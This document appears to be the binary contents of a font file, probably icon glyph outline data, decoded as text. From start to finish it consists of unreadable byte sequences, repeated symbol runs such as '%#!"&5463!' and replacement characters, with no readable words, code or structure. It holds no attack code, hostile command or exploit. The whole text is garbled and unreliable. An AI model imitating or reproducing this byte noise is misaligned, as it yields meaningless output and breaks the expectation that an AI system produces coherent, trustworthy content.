�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
��   %%


&%%


%@�`"2BS[�%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 � @�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
��   %%


&%%


%	@`5<LXamy�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#53#5##537532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�  `  �`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

@`�``�` @%%`�@

@�`"2>GS_h%#!"&5463!;!"3!;!2#!"&=463532654&+32654&##5#35335#3532654&+32654&#�%� %&@&���(88( �
��� &%��&% @&%` @

�`  `  @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&��`%% @

@`�``�@�`%% @

@�`5<LXan5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&##5'53753����&%�%�(88(� 
� 

@%���(88(`��v
� &%��&%{`%&@  @

� @ 00  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

````  HH  @�`"2>GT%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#75#'5#3�%� %&@&���(88(��
��� &%��&%{ @&%` @

�@ 00 @ �@%&�&�%@8(�(8�
�%�&%�&��`%% @

``  HH  ``@�`5<Lm32+#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#+"&=46;2#4&+";2653��(88(�%� %&`� ��(88( �%��

�
�
v��%& %&�& %& & 
 

 
  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�%&`%%

`

@�`"2S%#!"&5463!;!"3!;"3!26=4&#+"&=46;2#4&+";2653�%� %&@&���(88(@�
���%& %&�& %& & 
 

 
 �@%&�&�%@8(�(8�
�&�%&�%�%&`%%

`

@�`*C`gw��%7'>=4&+";267'#"&=46;2'5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46";2+"&51#1;2654&+"&546;234&##53�% &% 

 
,"'���&%�%�(88(� 
� 

@%���(88( ��v
� &%��&%[&% 

 
 % &% 

 
 %�� �	`&%`&
`

`
," `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@%%


&%%


%� �@�`"2I]��%#!"&5463!;!"3!;"3!26=4&#+"&=46;2''#"&=46;2''32#4&+";2+"&5131;2654&+"&546#53�%� %&@&���(88(@�
���%& %&� %& %

 
,"� % 
 

 %& % 
 

 %&�� �@%&�&�%@8(�(8�
�&�%&�%��&`%&`	
`

`
,"�%


%%&


%%� �	@�`5<LZcs|�5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&#532+732654&#32654&#����&%�%�(88(� 
� 

@%���(88( ��v
� &%��&%� `%%@&Z@

``%

&` @

@@

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

Xx%		%�@

`@

@�`"2@IYbk%#!"&5463!;!"3!;"3!26=4&###532##'32654&#532+732654&#32654&#�%� %&@&���(88(@�
���%& %&�z `%%@&Z@

``%

&` @

@@

�@%&�&�%@8(�(8�
�&�%&�%�`�%%`�@

Xx%		%�@

`@

	@`5<Lmy���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46+"&=46;2#4&+";26537532+#732654&#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�& %& & 
 

 
  `%&@  @

``%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%&`%%

`

`@%%`�@

 @%%`�@

@�`"2S_ht}%#!"&5463!;!"3!;!2#!"&=46#+"&=46;234&+";26573532654&+32654&#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� 
 

 
 & &% &  @&%` @

` @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�

`

%%`&%`�`%% @

 �`%% @

@`5<LTm{�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535##"&=46;5#";5#33##546;2#'"354&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@@

``&%``@�` & % @
`
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  `@
`
 %`&� `�%%��
  
@�`"2:Sal%#!"&5463!;!"3!;!2#!"&=463535##"&=46;5#";5#33354&+"357"354&+�%� %&@&���(88( �
��� &%��&%[ @�@@

``&%``@� % &  
`
 �@%&�&�%@8(�(8�
�%�&%�&`��  `@
`
 %`&� `�%%�``
  
@`5<LXcnx5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#'32+5326=4&+535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%@ 00 @@ 00 �`%&` @

@��� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT�&`%� �
`
@@ �` @�`"2>IT^%#!"&5463!;!"3!;!2#!"&=46373'7#'##326=4&+326=4&+535#3535�%� %&@&���(88( �
��� &%��&%@ 00 @@ 00 �`&%` @

@��� `�@%&�&�%@8(�(8�
�%�&%�&�pTTppTT�%`& �
`
@@ �` 	@`5<LWbr��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+732+"&=46";26=4&++"&=46;2#4&+";2653����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@� %& %&

 

  & %& & 
 

 
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

@�`"2=HYj�%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&+";26=4&+#+"&=46;234&+";265�%� %&@&���(88( �
��� &%��&%`&%` @

@�&% &% 

 

   
 

 
 & &% &�@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%	@`5<L\mx��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+732+5326=4&+33535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 �`%&` @

@� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
 &`%� �
`
��  @�`"2BS^iq%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+7326=4&+326=4&+33535#�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 �`&%` @

@� @��@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
 �%`& �
`
��  @`5<LX^�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#%#537";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[@ 00 @@ 00 `� �&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT  �%%


&%%


%@�`"2>Dr%#!"&5463!;!"3!;"3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546�%� %&@&���(88( �
���%& %&� @ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@%&�&�%@8(�(8�
�&�%&�%�pTTppTT  �%


%%&


%%
`5<LWbr���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#32+5326=4&+732+"&=46";26=4&++"&=46;2#4&+";26537'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� `%&` @

@� %& %&

 

  & %& & 
 

 
 `@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

0pTTppTT	�`"2=HXi��%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&#";26=4&+#+"&=46;234&+";2657373'7#'#`%� %&@&��`(88(��
��`�&&� &&`&%` @

@�&% &% 

 

   
 

 
 & &% &`@ 00 @@ 00 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%0pTTppTT	@`5<LXamv~5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#532+#732654&#!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&@  @

��`%&@  @

` @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 @%%`�@

��  @�`"2>GS\d%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#3532654&+32654&#!3535#�%� %&@&���(88( �
��� &%��&%� @&%` @

�� @&%` @

` @��@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �`%% @

��  	@`5<LZe���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+7";2+"&51#1;2654&+"&546;234&+532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �&% 

 
 % &% 

 
 % �`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 %%


&%%


%@@%%`�@

@�`"2@Kz��%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+7";2+"&51#1;2654&+"&546;234&+3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� % &  
`
 �&% 

 
 % &% 

 
 % � @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 %%


&%%


%@�`%% @

@`5<LXy�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535#+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ `  ` & %& & 
 

 
 `&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �  �%&`%%

`

�%%


&%%


%@�`"2>_�%#!"&5463!;!"3!;!2#!"&=46#35#535##+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[ `  `  
 

 
 & &% &`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&`�  �  �

`

%%`&%�%%


&%%


%	@`5<LZep{�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+%32+5326=4&+!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[` & % @
`
 �`%&` @

@� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 &`%� �
`
��  @�`"2@KVai%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+%326=4&+326=4&+!3535#�%� %&@&���(88( �
��� &%��&%[ % &  
`
 �`&%` @

@� @��@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 �%`& �
`
��  @`5<LXek5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#%'#353735##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[@ 00 @@ 00 0       �  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT�`�@@�� �@�`"2>KQ%#!"&5463!;!"3!;"3!26=4&#'373#'#%73#5#'#53#53�%� %&@&���(88( �
���%& %&� @ 00 @@ 00 0       @� �@%&�&�%@8(�(8�
�&�%&�%�pTTppTT�`�@@�� �@`5<LYfl5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#5'53753'#353735##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ @ 00 p0       �  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�```  HH  @`�@@�� �@�`"2?LR%#!"&5463!;!"3!;"3!26=4&##5'5375373#5#'#53#53�%� %&@&���(88( �
���%& %&�@ @ 00 p0       @� �@%&�&�%@8(�(8�
�&�%&�%�```  HH  @`�@@�� �@`5<LX5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4653#5##53����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[  `   `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�``�`@�`"2>%#!"&5463!;!"3!;"3!26=4&#53#5##53�%� %&@&���(88( �
���%& %&�  `  �@%&�&�%@8(�(8�
�&�%&�%�`�``�`@`5<LXdp5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#37'373#'#73#53#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;����`�@ 00 @@ 00 ���` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ pTTppTT`@ � @ @�`"2>JV%#!"&5463!;!"3!;"3!26=4&#3#53#37'373#'#73#53#3�%� %&@&���(88( �
���%& %&�����`�@ 00 @@ 00 ���`�@%&�&�%@8(�(8�
�&�%&�%�@ � @ pTTppTT`@ � @ @`5<LZelx5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+73#'3#35#535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �0 @ @ � `  ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
���� �  �  @�`"2@KR^%#!"&5463!;!"3!;"3!26=4&###546;2#'"354&+73#'3#53#3#53�%� %&@&���(88( �
���%& %&��` & % @
`
 �0 @ @ � `  ` �@%&�&�%@8(�(8�
�&�%&�%�`�%%��
  
����   �  
@`5<LWbnw��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+532+#732654&#%32+"&=46";26=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&` @

@�`%&@  @

�` %& %&

 

  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 @%%`�@

 &`%&`% 
`

`
	@�`"2=HT]m~%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+3532654&+32654&#%";26=4&#";26=4&+�%� %&@&���(88( �
��� &%��&%�`&%` @

@� @&%` @

�`&% &% 

 

 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 �`%% @

 %`&%`& 
`

`

`5<LWbr���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#32+5326=4&+732+"&=46";26=4&+33535#'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� `%&` @

@� %& %&

 

 � @�@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%@&`%� �
`
 &`%&`% 
`

`
��  PpTTppTT	�`"2=HXiq}%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&#";26=4&+33535#373'7#'#`%� %&@&��`(88(��
��`�&&� &&`&%` @

@�&% &% 

 

 � @�@ 00 @@ 00 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
��  PpTTppTT`5<LX^��!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#'373#'#%#537";2+"&51#1;2654&+"&546;234&+'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&�`@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�pTTppTT  �%%


&%%


%ppTTppTT�`"2>Dr~%#!"&5463!;!"3!;"3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546'373#'#`%� %&@&��`(88(��
��`&&�&&�`@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@ 00 @@ 00 �@%&�&�%@8(�(8�
�&�%&�%�pTTppTT  �%


%%&


%%ppTTppTT	@`5<L\mx��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+732+5326=4&+7";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 �`%&` @

@�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
 &`%� �
`
 %%


&%%


%@�`"2BS^i�%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+7326=4&+326=4&+7";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 �`&%` @

@�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
 �%`& �
`
 %%


&%%


%	@`5<LXamv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#532+#732654&#%";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&@  @

��`%&@  @

`&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 @%%`�@

 %%


&%%


%@�`"2>GS\�%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%� @&%` @

�� @&%` @

`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �`%% @

 %%


&%%


%	@`5<LWbr��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+732+"&=46";26=4&+33535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@� %& %&

 

 � @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 &`%&`% 
`

`
��  @�`"2=HYjr%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&+";26=4&+33535#�%� %&@&���(88( �
��� &%��&%`&%` @

@�&% &% 

 

 � @��@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
��  @`5<LT`h5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535#'373#'#%3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@ 00 @@ 00  @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  PpTTppTT���  @�`"2:FN%#!"&5463!;!"3!;!2#!"&=463535#373'7#'#3535#�%� %&@&���(88( �
��� &%��&%[ @�@ 00 @@ 00  @��@%&�&�%@8(�(8�
�%�&%�&`��  PpTTppTT ��  @`5<LZcku5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&#33535#535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%U `%%@&Z@

� @�� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

��  @@ �` @�`"2@IQ[%#!"&5463!;!"3!;!2#!"&=463'2654&+35532654&#33535#535#3535�%� %&@&���(88( �
��� &%��&%U@&@%%` @

� @�� `�@%&�&�%@8(�(8�
�%�&%�&�``%%�``@

��  @@ �` @`5<LY\gn5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735##73535#5#73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       �::    `0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��Pp@@ �� ���@�`"2?BMT%#!"&5463!;!"3!;!2#!"&=46'#353735#53535#5#'#37#�%� %&@&���(88( �
��� &%��&%k0       �::    `0 @ @ �@%&�&�%@8(�(8�
�%�&%�&�`�@@��PP @@ �� ���@`5<LV\c5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46535#3535#53?3#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;�� `� �0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ �` ` ����@�`"2<BI%#!"&5463!;!"3!;"3!26=4&#3##53##53?3#'3�%� %&@&���(88( �
���%& %&�`` ��@� �0 @ @ �@%&�&�%@8(�(8�
�&�%&�%� `� � ����@`5<LYen�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735#532+#732654&##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       @`%&@  @

�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��@@%%`�@

`@
`
 %`&� @�`"2?KTm%#!"&5463!;!"3!;!2#!"&=46'#353735#3532654&+32654&##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%k0       @ @&%` @

�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&�`�@@��@�`%% @

`@
`
 %`&� @`*C`gw%7'>=4&+";267'#"&=46;2'5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535#V% &% 

 
,"g���&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ @��	`&%`&
`

`
," `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  @�`"2I]e%#!"&5463!;!"3!;"3!26=4&#+"&=46;2''#"&=46;2'7#53##�%� %&@&���(88( �
���%& %&�� %& %

 
,"�@�@ �@%&�&�%@8(�(8�
�&�%&�%��&`%&`	
`

`
,"�  �@`5<LYep{5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735##35#535#732+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�0       ` `  `�`%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@�� �  �   &`%� �
`
@�`"2?KVa%#!"&5463!;!"3!;!2#!"&=46'#353735##35#535#7326=4&+326=4&+�%� %&@&���(88( �
��� &%��&%�0       ` `  `�`&%` @

@�@%&�&�%@8(�(8�
�%�&%�&�`�@@�� �  �   �%`& �
`
@`5<Ly���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4646;2+"&53;2654&+532654&+"#"&=46;5#";5#37532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%& %

& % 
 

  

 
 @

``&%``@@`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%%		%%


 


@@
`
 %`&� @@%%`�@

@�`"2_x��%#!"&5463!;!"3!;!2#!"&=46346;2+32+"&5#;2654&'>54&+"#"&=46;5#";5#373532654&+32654&#�%� %&@&���(88( �
��� &%��&% 
 

  

 
 % &

% &@@

``&%``@@ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�


 


%%		%%[@
`
 %`&� @�`%% @

	`5<LZeq{�!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&###546;2#'"354&+3#35#535#535#35353535#3535`@(88(��%� %&`� ��(88(@�%��

�
�
v��&%�&%��` & % @
`
 � `  `��� ``�� ` 8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�`�%%��
  
�  �  @@ �` @ �` �`"2@KWak%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+3#35#535#535#35353535#3535`%� %&@&���(88(`�
����%&�`%&� % &  
`
 � `  `��� ``�� `�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
�  �  @@ �` @ �` 	@`5<LZes~�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 ` & % @
`
  & %& & 
 

 
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
``�%%��
  
�%&`%%

`

@�`"2@KYd�%#!"&5463!;!"3!;"3!26=4&###546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653�%� %&@&���(88( �
���%& %&�`` & % @
`
 ` & % @
`
  & %& & 
 

 
 �@%&�&�%@8(�(8�
�&�%&�%�`�%%��
  
``�%%��
  
�%&`%%

`

@`5<LZhsz5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#'#5373537##546;2#'"354&+73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�00      �` & % @
`
 �0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��``�@@��``�%%��
  
����@�`"2@NY`%#!"&5463!;!"3!;"3!26=4&##'#5373537##546;2#'"354&+73#'3�%� %&@&���(88( �
���%& %&�p00      �` & % @
`
 �0 @ @ �@%&�&�%@8(�(8�
�&�%&�%��``�@@��``�%%��
  
����@`5<LVbnw5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4675#3357#35#535#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[�����@ `  `�`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��  �  ��  �   @%%`�@

@�`"2<HT]%#!"&5463!;!"3!;!2#!"&=4675#3357#35#535#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%[�����@ `  `� @&%` @

�@%&�&�%@8(�(8�
�%�&%�&��  �  ��  �   �`%% @

@`5<L\mu}5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+33535#!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 � @� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
��  ��  @�`"2BS[c%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+33535#!3535#�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 � @� @��@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
��  ��  @`5<LTmw5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535##"&=46;5#";5#375#335����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@@

``&%``@`����� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  `@
`
 %`&� @�  �  @�`"2:S]%#!"&5463!;!"3!;!2#!"&=463535##"&=46;5#";5#375#335�%� %&@&���(88( �
��� &%��&%[ @�@@

``&%``@`������@%&�&�%@8(�(8�
�%�&%�&`��  `@
`
 %`&� @�  �  @`5<LWbo�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+'#353735##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@�0       �@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
@`�@@��@
`
 %`&� @�`"2=HUn%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+'#353735##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%`&%` @

@�0       �@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
@`�@@��@
`
 %`&� @`5<LX���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535#7";2+"&51#1;2654&+"&546;234&+;2+"&=46";26=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ `  `�&% 

 
 % &% 

 
 % � %& %&

 

  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �   %%


&%%


%&`%&`% 
`

`
@�`"2>m~�%#!"&5463!;!"3!;!2#!"&=46#35#535#7";2+"&51#1;2654&+"&546;234&+3";26=4&+";26=4&+�%� %&@&���(88( �
��� &%��&%[ `  `�&% 

 
 % &% 

 
 % �&% &% 

 

 �@%&�&�%@8(�(8�
�%�&%�&`�  �   %%


&%%


%%`&%`& 
`

`

@`5<LZcq|��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&###546;2#'"354&+##532##'32654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%U `%%@&Z@

�` & % @
`
 � `%%@&Z@

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

``�%%��
  
``�%%`�@

	@�`"2@IWbpy%#!"&5463!;!"3!;"3!26=4&###532##'32654&###546;2#'"354&+##532##'32654&#�%� %&@&���(88( �
���%& %&� `%%@&Z@

�` & % @
`
 � `%%@&Z@

�@%&�&�%@8(�(8�
�&�%&�%�`�%%`�@

``�%%��
  
``�%%`�@

@`5<Leq{5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#"&=46;5#";5#37#35#535#535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�@

``&%``@` `  `��� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@
`
 %`&� `�  �  @@ �` @�`"2KWa%#!"&5463!;!"3!;!2#!"&=46#"&=46;5#";5#37#35#535#535#3535�%� %&@&���(88( �
��� &%��&%�@

``&%``@` `  `��� `�@%&�&�%@8(�(8�
�%�&%�&�@
`
 %`&� `�  �  @@ �` �	5	!!!�������r��s���s����� �	7!53!7%"&54632�``�``�%%%%��``�`���```%%%%`'#'3!53!3�����@�@�`� ��� ����@	���'!!3#3#3#3#3#3#!!333!�@���������������@����@@�������������@���@@@#5!3!265!!!!!!!!3#!!���%`(8���@����������@�����@%8( ����@@@@@@@@�����2'7>%''`B^@�@1��@ P�<�@8��^B1@�@� ��@P��@8����7'.'7#%5���@�@�;2c����������N@@�@�@��2;N��������������6$3#*10��Q�c��|H�0�@�d8�O�������	6	&7>%811.54632#"&'0>781>7���'P�f��
iiN98((88(	��9s��
���P��'�
��s9	(88((8��9Nii
���9234.234.7.54632#"&'%?�7j30W&%;`e��G�225`Fz�@��%%%	��@@�`;%&W03j7��e�`522�G]�zF�@@�`�	%%%���@����%&"'1;0232677'764'#5�&j&�y�k�(
�
�j�z�%%��m�m�*�%%�z�j�'�
